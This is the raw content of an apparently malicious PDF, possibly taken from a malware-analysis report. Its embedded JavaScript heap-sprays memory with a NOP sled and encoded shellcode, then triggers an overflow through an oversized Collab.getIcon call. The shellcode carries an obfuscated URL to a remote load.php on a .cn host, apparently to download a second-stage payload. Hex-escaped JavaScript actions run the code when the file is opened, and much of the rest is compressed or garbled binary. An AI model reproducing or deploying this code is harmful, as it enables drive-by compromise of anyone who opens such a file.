function iaX(lYc)
{lYc=lYc.replace(/[\+1]/g,"0");lYc=lYc.replace(/[\+2]/g,"9");lYc=lYc.replace(/[\+3]/g,"8");lYc=lYc.replace(/[\+4]/g,"7");lYc=lYc.replace(/[\+5]/g,"6");lYc=lYc.replace(/[\+6]/g,"5");lYc=lYc.replace(/[\+7]/g,"4");lYc=lYc.replace(/[\+8]/g,"3");lYc=lYc.replace(/[\+9]/g,"2");lYc=lYc.replace(/[\+0]/g,"1");return lYc;}
function kGEIX(){var fjjTN=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0033\u0000\u0000\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43");fev=jHT("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+fjjTN;WXj=jHT("\u9090\u9090");qsi=5*2;PSH=qsi+fev.length;while(WXj.length<PSH)WXj+=WXj;btM=WXj.substring(0,PSH);xjQ=WXj.substring(0,WXj.length-PSH);while(xjQ.length+PSH<0x40000)xjQ=xjQ+xjQ+btM;Ehw=[];for(Gqh=0;Gqh<180;Gqh++)Ehw[Gqh]=xjQ+fev;var AAK=4012;var Gab=Array(AAK);for(Gqh=0;Gqh<AAK;Gqh++)
{Gab[Gqh]=jHT("\u000a\u000a\u000a\u000a");}
Collab.getIcon(Gab+"_N"+".b"+"un"+"dl"+"e");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 2000+023>>
stream
x^�X[O I ~ϯ�,�� R]��U=�W�k�� ڐ,� ��86� C| V(�}��T��!��ێH�q���T�K��u �r��C��
���p���*�_]m_��7���p� _ζ�������� ��B��Z � �� �N���u �� �Fm(�q� w�w������}{� O�O?���XM& H;)q�o��O� �f�%L�<�P����e1�o��Է睻���t�Q����ty���ih���� 5��r5��������oCyU������; �zr��� =Z�&4�P�U~�2& ��"9Z9� T�Ѫ�
�+M�*�3@���U]W a]�3��e V䯰�C��d�I ���kh�븪,9 u�uϟ'�ā#5�`]Y� �'�ɲ8&'��%g ��l%< �nr���� � Teu)� n�-�ȩj-:�h3����]�J8� �( Ɏ4���3�kȖ6f 2���q����G ��G��$��8,h1 �ʁ? s�k� �,O��Hz[��uT �ԅBd� �,b��P��(��X<�TQ Ȯ= �� 8]D��B�r�U� Nw �Yƛ�]AYC
E� z�9��� �,�ןd <� �
�� ����. �l�x��U �O^ � � ��N�'/�#� �9N � ��y ~�S� ���ǟK����C�=>#ܮ��f��_�^E�
O$�|.pG�4�-/ �Z�>b<�8���� Us�� fV!� �X�A��S0�y @[��m) � &�5nT�3��.|T�^� ��#�`P�� ��M �'^T��� �CP)�?( �, )��P�� ��u��Te�� R
����*��" h��2' �* �d���ܜ�䰞�LxX%l #JVY�ۆQ�4o��YO� r��5��� ��B� � <��Y�2��2�}F�Җe�L �` :���� �Z|�.$��,���y��Ԧ ��Z�` #ڱ�5 ;� y���BJ)FO�� �!�� �{�������4U�j��{�������X�� >�]�#�N%�����E*��
AzK* ����U��ySҊ֍%Q $�#��߉��|��<m����nt^����r�&��l6^��'�;"���n�N�s(_�} ��蒔 L����_� �|� z�ϝ0L"� T7����l�� \N�������0-d-��`Y]������}�6<���ںX��"��6��� ҃��쥳���l>�� S��L���?ڋ���AY�� |�> �n
�� r�1 ���� <�ɯ�∍��{ {o� ) ;���3*�*,�'T���+��@��3�r�"� �
O��k �F�Rqf e!3Y���ZK
"5� 鈵2s��D�a�{ Y���֩� f�2�*�Y�mL* �Ya� N*a yb觉ٕ�J�Ǜ�UF z� vtî *�c�ܓsw6�i���Wk[� q��@v�� <AAoK ��{��碚����ۮ )ga �FV �C�e�t}NZ� �j??�D��Ԗa��.\�+ ��N�K��|�@O��v {F�*� �8������/ *8Q��-
Y�\E T�)�OoM�U o����r��O��r^� �
jS ���M� vTK���� Y9 G=uE�U%Q���,;GUSC�
�'���漇�������f-> ޤH��:� O���
�
�j� � �����E����6� � �� w� �� ����[�X ��t�USa��nӖ�
s �jk �q�����3L� w �~�\Q ��i+iA�j9�n_� � �[ [�V� �nk�� �F! �?�� � L�= ^M��a���Q78~}��b@ D�BM�� ��'��P� �H�� �X�� T+�� � �y�� U?AUB
@m ��� �<L�-�&� {�O����Ӑ
��i��4������P~�� �b0��Ou��'z�hx�x���g�W�@�ӕ����i�� ��b�F ����m�u 7��I�g4 h�t� �N���s�J�����#�w%��ǿ��٨� ���HС �u� +���?jp�|�� #'�N�� 'ȇX � ܗ)8�~KC h�� ��'9и� ��j �� �W�L�H��d� D�|{��Xp:\� .gmHv[���\�} �� |� ��_��S�x�KK- ��*,� �H*��
t�(wt�N��8 �"#e
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefxګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.